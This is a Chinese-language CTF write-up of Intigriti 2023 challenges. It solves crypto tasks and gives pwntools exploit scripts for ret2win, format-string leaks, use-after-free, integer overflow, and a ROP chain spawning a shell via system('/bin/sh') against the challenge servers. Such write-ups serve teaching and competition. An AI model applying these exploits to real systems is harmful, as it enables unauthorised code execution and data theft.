• [intigriti 2023] 部分题

    外国小比赛,作了一部分

    crypto

    ReallySecureApparently

    只给了n,e和一个文件,猜是c,e几乎和n一样长,猜是winer攻击

    1. n = 689061037339483636851744871564868379980061151991904073814057216873412583484720768694905841053416938972235588548525570270575285633894975913717130070544407480547826227398039831409929129742007101671851757453656032161443946817685708282221883187089692065998793742064551244403369599965441075497085384181772038720949 
    2. e = 98161001623245946455371459972270637048947096740867123960987426843075734419854169415217693040603943985614577854750928453684840929755254248201161248375350238628917413291201125030514500977409961838501076015838508082749034318410808298025858181711613372870289482890074072555265382600388541381732534018133370862587
    3.  
    4. #c = bytes_to_long(open('ciphertext','rb').read())
    5. c = 441001510077083440712098978980133930415086107290453312932779721137710693129669898774537962879522006041519477907847531444975796042514212299155087533072902229706427765901890350700252954929903001909850453303487994374982644931473474420223319182460327997419996588889034403777436157228265528747769729921745312710652
    1. from Crypto.Util.number import long_to_bytes,bytes_to_long
    2. def transform(x,y):
    3.     res = []
    4.     while y:
    5.         res.append(x//y)
    6.         x,y = y,x%y
    7.     return res
    8.  
    9. def continued_fraction(res):
    10.     numerator,denominator = 1,0
    11.     for i in res[::-1]:
    12.         denominator,numerator = numerator,i*numerator+denominator
    13.     return numerator,denominator
    14.  
    15. def wiener_attack(c,res,n):
    16.     print("Attack start...")
    17.     for i in range(1,len(res)):
    18.         ress = res[:i]
    19.         d = continued_fraction(ress)[1]
    20.         m = long_to_bytes(int(pow(c,d,n)))
    21.         #if all(0x20<=k<=0x7f for k in m):
    22.         if b'{' in m and b'}' in m:
    23.             print(m)
    24.         
    25. res = transform(e,n)
    26. wiener_attack(c,res,n)
    27.  
    28. #INTIGRITI{0r_n07_50_53cur3_m4yb3}

    Keyless

    通过+,*,^进行的加密,次数比一般题多点

    1. def encrypt(message):
    2.     encrypted_message = ""
    3.     for char in message:
    4.         a = (ord(char) * 2) + 10
    5.         b = (a ^ 42) + 5
    6.         c = (b * 3) - 7
    7.         encrypted_char = c ^ 23
    8.         encrypted_message += chr(encrypted_char)
    9.     return encrypted_message
    10.  
    11. flag = "INTIGRITI{REDACTED}"
    12. encrypted_flag = encrypt(flag)
    13.  
    14. with open("flag.txt.enc", "w") as file:
    15.     file.write(encrypted_flag)
    1. d = [((enc[i]&0x1f)<<6)+(enc[i+1]&0x3f) for i in range(0,len(enc),2)]
    2. b = [(((((i^23)+7)//3 - 5)^42) - 10)//2 for i in d]
    3. bytes(b)
    4. #INTIGRITI{m4yb3_4_k3y_w0uld_b3_b3773r_4f73r_4ll}

    Not So Smooth

    a,b未知,但运算时只需要pow(u,n,p)所以不必求出a,b

    1. from Crypto.Util.number import long_to_bytes
    2. from Crypto.Util.strxor import strxor
    3. from random import randint
    4. from flag import FLAG
    5.  
    6. def f(x, n):  
    7.     return (pow(u,n,p)*x + v*(1-pow(u,n,p))*pow(1-u, -1, p)) % p  
    8.  
    9. p = 97201997431130462639713476119411091922677381239967611061717766639853376871260165905989218335681560177626304205941143288128749532327607316527719299945637260643711897738116821179208534292854942631428531228316344113303402450588666012800739695018334321748049518585617428717505851025279186520225325765864212731597
    10. u = 14011530787746260724685809284106528245188320623672333581950055679051366424425259006994945665868546765648275822501035229606171697373122374288934559593175958252416643298136731105775907857798815936190074350794406666922357841091849449562922724459876362600203284195621546769313749721476449207319566681142955460891977927184371401451946649848065952527323468939007868874410618846898618148752279316070498097254384228565132693552949206926391461108714034141321700284318834819732949544823937032615318011463993204345644038210938407875147446570896826729265366024224612406740371824999201173579640264979086368843819069035017648357042
    11. v = 16560637729264127314502582188855146263038095275553321912067588804088156431664370603746929023264744622682435376065011098909463163865218610904571775751705336266271206718700427773757241393847274601309127403955317959981271158685681135990095066557078560050980575698278958401980987514566688310172721963092100285717921465575782434632190913355536291988686994429739581469633462010143996998589435537178075521590880467628369030177392034117774853431604525531066071844562073814187461299329339694285509725214674761990940902460186665127466202741989052293452290042871514149972640901432877318075354158973805495004367245286709191395753
    12. w = 30714296289538837760400431621661767909419746909959905820574067592409316977551664652203146506867115455464665524418603262821119202980897986798059489126166547078057148348119365709992892615014626003313040730934533283339617856938614948620116906770806796378275546490794161777851252745862081462799572448648587153412425374338967601487603800379070501278705056791472269999767679535887678042527423534392867454254712641029797659150392148648565421400107500607994226410206105774620083214215531253544274444448346065590895353139670885420838370607181375842930315910289979440845957719622069769102831263579510660283634808483329218819353
    13. a = randint(0, 2**2048)
    14. b = randint(0, 2**2048)
    15. A = f(w, a)
    16. B = f(w, b)
    17. key = long_to_bytes(f(B, a))[:len(FLAG)]
    18. enc = strxor(FLAG, key)
    19. print(f"{A = }")
    20. print(f"{B = }")
    21. print(f"{enc = }")
    22.  
    23.  
    24. A = 7393401480034113709683683682039780458211722756040975666277858366986963864147091724359492764726999692812421940595309756560491142512219957986281425163574890752574157617546760386852366936945888357800966704941013951530688031419816817272581287237223765833452303447283089906937413964658335387593899889933721262202
    25. B = 6919381992041136573008188094979879971060160509085428532054694712745921654244468113796582501225839242977870949915769181804595896718922228206397860738237256125972615830799470450058633231003927061049289907097099916321068776956652172887225970642896455423957706532253349472544176183473470843719479781727784095989
    26. enc = b'\xcfW\x85\x8d\xedU\xdd\xd9`\x16f\xb8j(\xeb9-\x1b\xb8\x18 0av\xe5\xabK\xc6'
    1. '''
    2.     k                   k             y
    3. (pow(u,n,p)*x + v*(1-pow(u,n,p))*pow(1-u, -1, p)) % p  
    4. (k*x + v*(1-k)*y) % p
    5. (kx + vy*(1-k)) % p
    6. kx + vy - vyk = k(x-vy)+vy %p 
    7. '''
    8. y = pow(1-u, -1, p)
    9. k1 = (A - v*y )*pow(w-v*y, -1, p) %p #k1 = pow(u,a,p)
    10. #f(B,a)
    11. fba = (k1 * B + v*(1-k1)*y) %p
    12. xor(enc, long_to_bytes(fba)[:len(enc)])
    13. #INTIGRITI{1e863724be1ea6d3e}

    1-10

    背包加密

    1. from random import randint
    2. from re import search
    3. from flag import FLAG
    4.  
    5. cs = [randint(0, 2**1000) for _ in range(10)]
    6. xs = [randint(0, 2**64) for _ in range(10)]
    7. xs = [ord(f) + i - (i%1000)  for i, f in zip(xs, search("{(.*)}", FLAG).group(1))]
    8.  
    9. print(f"{cs = }")
    10. print(f"s = {sum(c*x for c, x in zip(cs, xs))}")
    11.  
    12. cs = [8508903290440008966939565321248693758153261635170177499193552423579929500027826696702216711413627480472568726828904707392607240309148374882044455682656477650413559779578913981575195542381602155806438946382809049847521263107908111429547314575039079118614485792613461747911710760754291582134293099750060, 10234293217173095983648586990138462404689872504690765936890158736280331352728086141006820545673419953576281340699793983414878095413526583845311613647542879798224462254801103246845064675391113534349390649562211376117941776588135441368773636568930887968431002105334751994385414474789708434897717472259757, 6001064586644974650131784742218587067958465984737568290249286706923485137083921908971767187010824715217158349948368322929900720010489749231105336650564421771867089333709608235963711368415685056362117910529113580811922176651335662802405504434103542105450330213217418470901029864459362153866361049469621, 5859510800336462649673113647904370677448984650623412649303149431740483580968255760095323745895405406649271411277663981671465673293279417168147656423009231087547991428322779036740050269460373254323377738756038706795196225547099530503996157675637620918729310987613041873955654973230573780794437230183289, 8212120161226957435594246142362544687871307206030517377713172267061914524817671684448986080347503212333314134144272096534190656954277299391948626024244379808998220515649968150824587976113971840005858079163744362874678111323034234960076591622752217194796532407435861854992608669653483268713825154541681, 4292538496747452556903766205458518557016170261915268175117554973221631407580344459540989898488936014316805799620957521118332103032738032797936315597220903773140347787977387271254963436603728977128756213671653297994336981775219965231686927050793105808729293803455246360077380768093287937551667515822737, 8583458084429417950887051233123781099671792568724013361916924355046040863544385972858215904752358387759143712618915109914726815547284050405347634520790328222420443989299783668017365846692013464579110450651166600940834254189911732107856656458621485902792541383514622551498513045029193930072821693821256, 927938350277846540058170699346614173130036388369329189433895716040551556863284640834396837739290832786836335265440745786025530973467859153202044442045287145528583412999497854136387626360287750242048999254798532603013016406637079389023297629455299864761196574249382738851682248453939600976884575974199, 4606866838328488359534883828872534448488908284003992208192170511899852596906485417934690617926601159129473558885893097400239110669875450476234618534668886892219546199419412794765402627731086862572263105282498567494065303352715044800789544479262215220148659740517187562922289802434925672447697743660640, 5696622808956926263797513675882969816326582766528835713485415099018508834817057303528828064039948371652175876967703746446602159940653502950606513683435185458750394450192106019388424601807240033502531431423705043713657847236861816929000927218441444067742560786753091009546483807078198791541719979069795]
    13. s = 605466527953516222016485516214431809590993588699320208021845670703468281059947406248463347211427615855012720451029976981068579151311047123161756448068506197424807516350675172131826275005312472029312861168498961728971558322943730466676859739724928104907194812943584226111451426124864722285484117269190235012612078303171378
    1. M = matrix(ZZ, 11,11)
    2. for i in range(10):
    3.     M[i,-1] = cs[i]
    4.     M[i,i] = 1
    5.  
    6. M[-1,-1] = -s 
    7. v = M.LLL()[0]
    8. bytes([v%1000 for i in v[:-1]])
    9. #3a8a32c7f6
    10. #INTIGRITI{3a8a32c7f6}

    PWN

    hidden

    PIE打开,但通过溢出到ret通过修改ret_main最后一字节可以实现返回并取得加载地址。然后再执行时溢出到后门。

    1. __int64 input()
    2. {
    3.   __int64 buf[6]; // [rsp+0h] [rbp-40h] BYREF
    4.   __int16 v2; // [rsp+30h] [rbp-10h]
    5.  
    6.   memset(buf, 0, sizeof(buf));
    7.   v2 = 0;
    8.   puts("Tell me something:");
    9.   read(0, buf, 0x50uLL);
    10.   printf("I remember what you said: ");
    11.   puts((const char *)buf);
    12.   return 0LL;
    13. }
    1. from pwn import *
    2.  
    3. #p = process('./hidden')
    4. p = remote('hidden.ctf.intigriti.io', 1337)
    5. context(arch='amd64', log_level='debug')
    6.  
    7. p.sendafter(b"Tell me something:\n", b'A'*0x48+p8(0x59))
    8. p.recvuntil(b'A'*0x48)
    9.  
    10. elf_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x1359
    11. backdoor = elf_base + 0x11D9
    12.  
    13. p.sendafter(b"Tell me something:\n", b'A'*0x48+p64(backdoor))
    14.  
    15. p.interactive()
    16. #INTIGRITI{h1dd3n_r3T2W1n_G00_BrrRR}

    Floor Mat Store

    flag已经读入并且有指针,输入6的时候有printf漏洞,直接打出flag

    1.   s[0] = "1. Cozy Carpet Mat - $10";
    2.   s[1] = "2. Wooden Plank Mat - $15";
    3.   s[2] = "3. Fuzzy Shag Mat - $20";
    4.   s[3] = "4. Rubberized Mat - $12";
    5.   s[4] = "5. Luxury Velvet Mat - $25";
    6.   s[5] = "6. Mysterious Flag Mat - $1337";
    7.   v8 = v11;
    8.   rgid = getegid();
    9.   setresgid(rgid, rgid, rgid);
    10.   stream = fopen("flag.txt", "r");
    11.   if ( !stream )
    12.   {
    13.     puts("You have a flag.txt, right??");
    14.     exit(0);
    15.   }
    16.   puts(
    17.     "Welcome to the Floor Mat store! It's kind of like heaven.. for mats.\n"
    18.     "\n"
    19.     "Please choose from our currently available floor mats\n"
    20.     "\n"
    21.     "Note: Out of stock items have been temporarily delisted\n");
    22.   puts("Please select a floor mat:\n");
    23.   for ( i = 0; i <= 4; ++i )
    24.     puts(s[i]);
    25.   puts("\nEnter your choice:");
    26.   __isoc99_scanf("%d", &v4);
    27.   if ( v4 <= 0 || v4 > 6 )
    28.   {
    29.     puts("Invalid choice!\n");
    30.     exit(1);
    31.   }
    32.   v7 = v4 - 1;
    33.   while ( getchar() != 10 )
    34.     ;
    35.   if ( v7 == 5 )
    36.     fgets(v11, 64, stream);
    37.   puts("\nPlease enter your shipping address:");
    38.   fgets(format, 128, stdin);
    39.   puts("\nYour floor mat will be shipped to:\n");
    40.   printf(format);
    41.   return 0;
    42. }

    ┌──(kali㉿kali)-[~/ctf/1118]
    └─$ nc floormats.ctf.intigriti.io 1337
    Welcome to the Floor Mat store! It's kind of like heaven.. for mats.

    Please choose from our currently available floor mats

    Note: Out of stock items have been temporarily delisted

    Please select a floor mat:

    1. Cozy Carpet Mat - $10
    2. Wooden Plank Mat - $15
    3. Fuzzy Shag Mat - $20
    4. Rubberized Mat - $12
    5. Luxury Velvet Mat - $25

    Enter your choice:
    6

    Please enter your shipping address:
    %10$s

    Your floor mat will be shipped to:

    INTIGRITI{50_7h475_why_7h3y_w4rn_4b0u7_pr1n7f}

    Maltigriti

     给了很长的代码,在free时有个uaf,而且给了后门

    1. // pwn/maltigriti
    2. // by c0nrad - Sloppy Joe Pirates
    3. // Enjoy <3
    4.  
    5. #include 
    6. #include 
    7. #include 
    8.  
    9. const char STATUS_ACCEPTED = 'A';
    10. const char STATUS_REJECTED = 'R';
    11. const char STATUS_DUPLICATE = 'D';
    12.  
    13. struct User {
    14.     char name[32];
    15.     char password[32];
    16.     int bio_length;
    17.     char *bio;
    18. };
    19.  
    20. struct Report {
    21.     struct User *user;
    22.     char status;
    23.     long bounty;
    24.     char title[32];
    25.     char body[128];
    26.     struct Report *next;
    27. };
    28.  
    29. void print_reports(struct Report *report) {
    30.     int counter = 1;
    31.     while (report != NULL) {
    32.         printf("--- Report #%d ---\n", counter++);
    33.         printf("Title: %s\n", report->title);
    34.         printf("Body: %s\n", report->body);
    35.  
    36.         if (report->status == STATUS_ACCEPTED) {
    37.             printf("Status: Accepted\n");
    38.         } else if (report->status == STATUS_REJECTED) {
    39.             printf("Status: Rejected\n");
    40.         } else if (report->status == STATUS_DUPLICATE) {
    41.             printf("Status: Duplicate\n");
    42.         } else {
    43.             printf("Status: Unknown\n");
    44.         }
    45.  
    46.         printf("Bounty: %ld\n", report->bounty);
    47.         report = report->next;
    48.     }
    49. }
    50.  
    51. void setup() {
    52.     setvbuf(stdin, (char *)0x0, 2, 0);
    53.     setvbuf(stdout, (char *)0x0, 2, 0);
    54.     setvbuf(stderr, (char *)0x0, 2, 0);
    55. }
    56.  
    57. void menu() {
    58.     puts("\n\n--- Welcome to maltigriti's bug bounty reporting system! ---");
    59.     puts("0. Register User");
    60.     puts("1. Edit User");
    61.     puts("2. Submit a bug report");
    62.     puts("3. Print Reports");
    63.     puts("4. Print Balance");
    64.     puts("5. Buy Swag Pack");
    65.     puts("6. Logout");
    66.     puts("7. Exit");
    67.     printf("menu> ");
    68. }
    69.  
    70. void edit_user(struct User *user) {
    71.     if (user != 0 && user->bio != NULL) {
    72.         printf("Your current bio is: %s\n", user->bio);   //leak
    73.         printf("Enter your new bio> ");
    74.         fgets(user->bio, user->bio_length, stdin);
    75.     } else {
    76.         puts("You don't have a bio yet!");
    77.         printf("How long is your bio> ");
    78.  
    79.         scanf("%d", &user->bio_length);
    80.         getchar();
    81.  
    82.         user->bio = malloc(user->bio_length);
    83.         printf("Enter your new bio> ");
    84.  
    85.         fgets(user->bio, user->bio_length, stdin);
    86.     }
    87. }
    88.  
    89. void logout(struct User *user) {
    90.     if (user != NULL) {
    91.         memset(user->name, 0, 32);
    92.         memset(user->password, 0, 32);
    93.         memset(user->bio, 0, user->bio_length);
    94.         free(user->bio);
    95.     }
    96. }
    97.  
    98. int calculate_balance(struct Report *report, struct User *user) {
    99.     int balance = 0;
    100.  
    101.     while (report != NULL) {
    102.         if (report->status == STATUS_ACCEPTED && report->user == user) {
    103.             balance += report->bounty;
    104.         }
    105.         report = report->next;
    106.     }
    107.     printf("Your balance is: %d\n", balance);
    108.     return balance;
    109. }
    110.  
    111. void buy_swag_pack(struct Report *report, struct User *user) {
    112.     if (calculate_balance(report, user) >= 1337) {
    113.         puts("You have enough money to buy a swag pack!");
    114.         puts("With great swag comes great responsibility.");
    115.         puts("Here is your swag pack: flag{redacted_redacted}");
    116.         exit(0);
    117.     } else {
    118.         puts("You don't have enough money to buy a swag pack!");
    119.         puts("Keep submitting bug reports and maybe you'll get there one day!");
    120.         puts(":evil_grin:");
    121.     }
    122. }
    123.  
    124. struct User *register_user() {
    125.     struct User *user = malloc(sizeof(struct User));
    126.  
    127.     printf("Enter your name> ");
    128.     fgets(user->name, 32, stdin);
    129.  
    130.     printf("Enter your password> ");
    131.     fgets(user->password, 32, stdin);
    132.  
    133.     edit_user(user);
    134.     return user;
    135. }
    136.  
    137. struct Report *new_report(struct Report *firstReport, struct User *user) {
    138.     struct Report *report = malloc(sizeof(struct Report));
    139.  
    140.     if (firstReport != NULL) {
    141.         // get last report
    142.         struct Report *scanner = firstReport;
    143.         while (scanner->next != NULL) {
    144.             scanner = scanner->next;
    145.         }
    146.         scanner->next = report;
    147.     } else {
    148.         firstReport = report;
    149.     }
    150.  
    151.     report->user = user;
    152.  
    153.     printf("Enter your report title> ");
    154.     fgets(report->title, 32, stdin);
    155.  
    156.     printf("Please enter the content of your report> ");
    157.     fgets(report->body, 128, stdin);
    158.  
    159.     // Automatically mark the status as duplicate so we don't have to pay anyone :evil_grin:
    160.     report->status = STATUS_DUPLICATE;
    161.     report->bounty = 0;
    162.  
    163.     puts("Thank you for submitting your bug report!");
    164.     puts("Unfortunately our records indicate that this bug has already been submitted!");
    165.     puts("Report will be closed and marked as duplicate.");
    166.     puts("Hope you didn't spend too much time on it! ( ͡° ͜ʖ ͡°) ");
    167.  
    168.     return firstReport;
    169. }
    170.  
    171. int main() {
    172.     struct Report *reports = 0;
    173.     struct User *user = 0;
    174.     int report_count = 0;
    175.  
    176.     int menu_choice = 0;
    177.     setup();
    178.     while (1) {
    179.         menu();
    180.         scanf("%d", &menu_choice);
    181.         getchar();
    182.  
    183.         switch (menu_choice) {
    184.             case 0:
    185.                 user = register_user();
    186.                 break;
    187.             case 1:
    188.                 edit_user(user);
    189.                 break;
    190.             case 2:
    191.                 reports = new_report(reports, user);
    192.                 break;
    193.             case 3:
    194.                 print_reports(reports);
    195.                 break;
    196.             case 4:
    197.                 calculate_balance(reports, user);
    198.                 break;
    199.             case 5:
    200.                 buy_swag_pack(reports, user);
    201.                 break;
    202.             case 6:
    203.                 logout(user);
    204.                 break;
    205.             case 7:
    206.                 exit(0);
    207.                 break;
    208.             default:
    209.                 puts("Invalid choice!");
    210.                 break;
    211.         }
    212.     }
    213. }
    1. from pwn import *
    2.  
    3. #p = process('./maltigriti')
    4. p = remote('maltigriti.ctf.intigriti.io', 1337)
    5. context(arch='amd64', log_level='debug')
    6.  
    7. def add_user():
    8.     p.sendlineafter(b"menu> ", b'0')
    9.     p.sendlineafter(b"Enter your name> ", b'AAA')
    10.     p.sendlineafter(b"Enter your password> ", b'AAA')
    11.  
    12. def add_bio(bio):
    13.    p.sendlineafter(b"How long is your bio> ", str(0xc8).encode())  #bio == report
    14.    p.sendlineafter(b"Enter your new bio> ", bio)
    15.  
    16. def edit_user():
    17.    p.sendlineafter(b"menu> ", b'1')
    18.    p.recvuntil(b"Your current bio is: ")
    19.    ptr = u64(p.recvline()[:-1].ljust(8,b'\x00'))
    20.    p.sendlineafter(b"Enter your new bio> ", p64(ptr)+ b'A'+ b'\x00'*7 + p32(2337))
    21.  
    22. def free_user():
    23.     p.sendlineafter(b"menu> ", b'6')
    24.  
    25. def add_report():
    26.     p.sendlineafter(b"menu> ", b'2')
    27.     p.sendlineafter(b"Enter your report title> ", b'A')
    28.     p.sendlineafter(b"Please enter the content of your report> ", b'A')
    29.  
    30. def door():
    31.     p.sendlineafter(b"menu> ", b'5')
    32.  
    33. add_user()
    34. add_bio(b'A')
    35. free_user()
    36. add_report()
    37.  
    38. edit_user()
    39. door()
    40. #gdb.attach(p)
    41. #pause()
    42.  
    43. p.interactive()
    44. #INTIGRITI{u53_4f73r_fr33_50und5_600d_70_m3}

    Over The Edge

    头回见python的pwn,要求输入一个64位数,由于使用了定长数字,这也是会溢出的。

    1. import numpy as np
    2. import warnings
    3. import socket, sys
    4. import threading
    5.  
    6. warnings.filterwarnings("ignore", category=RuntimeWarning)
    7. warnings.filterwarnings("ignore", category=DeprecationWarning)
    8.  
    9. def process_input(input_value):
    10.     num1 = np.array([0], dtype=np.uint64)
    11.     num2 = np.array([0], dtype=np.uint64)
    12.     num2[0] = 0
    13.     a = input_value
    14.     if a < 0:
    15.         return "Exiting..."
    16.     num1[0] = (a + 65)
    17.     if (num2[0] - num1[0]) == 1337:
    18.         return 'You won!\n'
    19.     return 'Try again.\n'
    20.  
    21. def handle_client(client_socket, client_address):
    22.     try:
    23.         print(f"Accepted connection from {client_address}")
    24.         client_socket.send(b"Time to jump over the edge!\n")
    25.         client_socket.send(b"")
    26.         
    27.         while True:
    28.             input_data = client_socket.recv(1024).decode().strip()
    29.             if not input_data:
    30.                 break
    31.             input_value = int(input_data)
    32.             response = process_input(input_value)
    33.             if response == 'You won!\n':
    34.                 with open("flag", "r") as flag_file:
    35.                     flag_content = flag_file.read()
    36.                     client_socket.send(flag_content.encode())
    37.                 client_socket.close()
    38.                 break
    39.             else:
    40.                 client_socket.send(response.encode())
    41.  
    42.         client_socket.close()
    43.         print(f"Connection from {client_address} closed")
    44.     except:
    45.         client_socket.close()
    46.  
    47. def main():
    48.     host = '0.0.0.0'
    49.     port = 1337
    50.  
    51.     server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    52.     server_socket.bind((host, port))
    53.     server_socket.listen()
    54.  
    55.     print(f"Listening on {host}:{port}")
    56.  
    57.     while True:
    58.         client_socket, client_address = server_socket.accept()
    59.         
    60.         client_thread = threading.Thread(target=handle_client, args=(client_socket, client_address))
    61.         client_thread.start()
    62.  
    63. if __name__ == "__main__":
    64.     main()
    1. ┌──(kali㉿kali)-[~/ctf/1118]
    2. └─$ nc edge2.ctf.intigriti.io 1337
    3. Time to jump over the edge!
    4. 18446744073709550214
    5. INTIGRITI{fUn_w1th_1nt3g3r_0v3rfl0w_11}

    Reading in the Dark

    要求输入定制的串,并可以printf,这样可以得到想要的地址,然后利用这个给出的时间作个整型溢出进入admin_read溢出写rop

    1. void __fastcall __noreturn menu(char *a1)
    2. {
    3.   unsigned int current_time; // eax
    4.   int v2; // [rsp+1Ch] [rbp-24h]
    5.  
    6.   while ( 1 )
    7.   {
    8.     while ( 1 )
    9.     {
    10.       do
    11.       {
    12.         while ( 1 )
    13.         {
    14.           printf("> ");
    15.           fgets(a1, 256, stdin);
    16.           if ( !validate_data(a1) )             // 4个|且头尾都是|
    17.           {
    18.             puts("Invalid data...");
    19.             exit(1);
    20.           }
    21.           v2 = parse_function(a1);
    22.           if ( v2 != 4 )
    23.             break;
    24.           if ( !(unsigned __int8)validate_timestamp(a1) )
    25.             goto LABEL_18;
    26.           admin_read(a1);
    27.         }
    28.       }
    29.       while ( v2 > 4 );
    30.       if ( v2 != 3 )
    31.         break;
    32.       if ( (unsigned __int8)validate_timestamp(a1) )
    33.         read_in_the_dark();
    34.       else
    35. LABEL_18:
    36.         puts("Invalid Timestamp.");
    37.     }
    38.     if ( v2 == 1 )
    39.     {
    40.       current_time = get_current_time();
    41.       fprintf(_bss_start, "%d\n", current_time);
    42.     }
    43.     else if ( v2 == 2 )
    44.     {
    45.       if ( !(unsigned __int8)validate_timestamp(a1) )
    46.         goto LABEL_18;
    47.       echo(a1);
    48.     }
    49.   }
    50. }
    1. #from ctypes import *
    2. from pwn import *
    3.  
    4. #clibc = cdll.LoadLibrary("./libc.so.6")
    5. context(arch='amd64', log_level='debug')
    6.  
    7. elf = ELF('./ritd')
    8. libc = ELF('./libc6_2.35-0ubuntu3.1_amd64.so')
    9.  
    10. #p = process('./ritd')
    11. p = remote('ritd.ctf.intigriti.io', 1337)
    12.  
    13. #gdb.attach(p, "b*0x555555555892\nc")
    14.  
    15.  
    16. #gettime
    17. pay = b'|1|1||'
    18. p.sendlineafter(b">", pay)
    19. p.recvline()
    20. v = int(p.recvline()) + 0x100000000
    21.  
    22. #v = clibc.time(0)
    23. pay = f'|{v:10d}|4%75$p,%76$p,%77$p,%143$p,||' #{clibc.time(0):10d}
    24. print(pay)
    25. p.sendlineafter(b">", pay)
    26.  
    27. p.recvuntil(b'4')
    28. canary = int(p.recvuntil(b',', drop=True),16)
    29. stack  = int(p.recvuntil(b',', drop=True),16) - 0x50
    30. elf.address = int(p.recvuntil(b',', drop=True),16) - 0x1a45
    31. libc.address = int(p.recvuntil(b',', drop=True),16) - 128 - libc.sym['__libc_start_main']
    32. print(f"{canary = :x} {stack = :x} {elf.address = :x} {libc.address = :x}")
    33.  
    34. pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
    35. bin_sh = next(libc.search(b'/bin/sh\x00'))
    36. leave_ret = elf.address + 0x17c2
    37.  
    38. p.sendlineafter(b"In order to read, you must write. Where would you like to write? (give hex address without 0x)\n", f"{stack:x}".encode())
    39. p.sendlineafter(b"Now what byte would u like to write there?\n", b'0')
    40. p.sendafter(b"Did you read what you wanted to read?\n", flat(0, pop_rdi+1, pop_rdi, bin_sh, libc.sym['system'],canary, stack-0x30, leave_ret)[1:])
    41. #gdb.attach(p)
    42. #pause()
    43.  
    44. p.interactive()
    45.  
    46. '''
    47. 0x00007fffffffdcb8│+0x0228: 0x90f6c47616335500                     <------ 75 canary
    48. 0x00007fffffffdcc0│+0x0230: 0x00007fffffffdd10  →  0x00007fffffffde30  ← $rbp   <-------- 76 
    49. 0x00007fffffffdcc8│+0x0238: 0x0000555555555a45  →   mov DWORD PTR [rbp-0x24], eax   <------- 77 elf
    50. 0x00007fffffffded8│+0x0448: 0x00007ffff7c29e40  →  <__libc_start_main+128>                    <------- 
    51. '''

  • 相关阅读:
    FPGA之旅设计99例之第二例-----按键
    mysql常用操作集合
    Unity设计模式——建造者模式
    Linux开发工具---->yum/gcc/g++/gdb/makefile
    JackJson多态
    MATLAB——概率神经网络分类问题程序
    Sylar C++高性能服务器学习记录05 【线程模块-知识储备篇】
    asp.net+sqlserver医院体检信息管理系统
    Linux开机自动执行某些命令运行自定义脚本的方法
    数据湖是什么?数据湖的关键技术(二)
  • 原文地址:https://blog.csdn.net/weixin_52640415/article/details/134495275